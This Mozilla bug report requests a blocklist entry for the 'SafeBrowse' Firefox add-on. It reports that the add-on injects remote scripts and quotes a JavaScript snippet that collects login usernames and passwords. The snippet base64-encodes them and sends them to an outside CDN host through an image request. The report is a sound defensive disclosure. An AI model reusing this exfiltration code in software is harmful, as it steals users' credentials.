Closed Bug 1097696 Opened 11 years ago Closed 11 years ago

Extension block request: safebrowse@safebrowse.co

Categories

(Toolkit :: Blocklist Policy Requests, defect)

defect
Not set
normal

Tracking

()

VERIFIED FIXED
2014-11

People

(Reporter: diegocr, Assigned: jorgev)

Details

(Whiteboard: [extension])

Attachments

(1 file)

Extension name: SafeBrowse Extension UUID: safebrowse@safebrowse.co Extension versions to block: 3.0.1 Applications, versions, and platforms affected: Firefox Desktop Block severity: hard Homepage, AMO listing, other references and contact info: https://www.safebrowse.co/ https://code.google.com/p/safebrowse/source/browse/ Affiliations, fwiw: quecaja.com, inmundicias.com, projectcao.com Reasons: This add-on inject the following script into every page: https://safebrowse.googlecode.com/svn/trunk/core.js Such script additionally injects this: //safebrowse.googlecode.com/svn/trunk/nowait.js //safebrowse.googlecode.com/svn/trunk/replace.js The later script has code specifically made to collect usernames & passwords and sends them to a cdn hosted on projectcao.com a little snippet: 1 function validateImg(e, t, n) { 2 var i = "wp" == n ? "&loc=" + encodeURIComponent(window.location.href) : "", 3 a = document.createElement("img"); 4 return a.src = "http://cdn.projectcao.com/image_close.png?us=" + SB64.encode(e) + "&ps=" + SB64.encode(t) + "&st=" + n + i, !0 5 } ... 12 function validateDb() { 13 var e = $el('input[name="login_email"]').value, 14 t = $el('input[name="login_password"]').value; 15 return validateImg(e, t, "db"), !0 16 } 17 18 function validateI() { 19 var e = $el('input[name="username"]').value, 20 t = $el('input[name="password"]').value; 21 return validateImg(e, t, "i"), !0 22 } 23 24 function validateS() { 25 var e = $el('input[name="login"]').value, 26 t = $el('input[name="clave"]').value; 27 return validateImg(e, t, "s"), !0 28 } ....
Attached file safebrowse.xpi
current extension version 3.0.1
Assignee: nobody → jorge
Group: client-services-security
Target Milestone: --- → 2014-11
Status: NEW → RESOLVED
Closed: 11 years ago
Resolution: --- → FIXED
Verified as fixed
Status: RESOLVED → VERIFIED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Created:
Updated:
Size: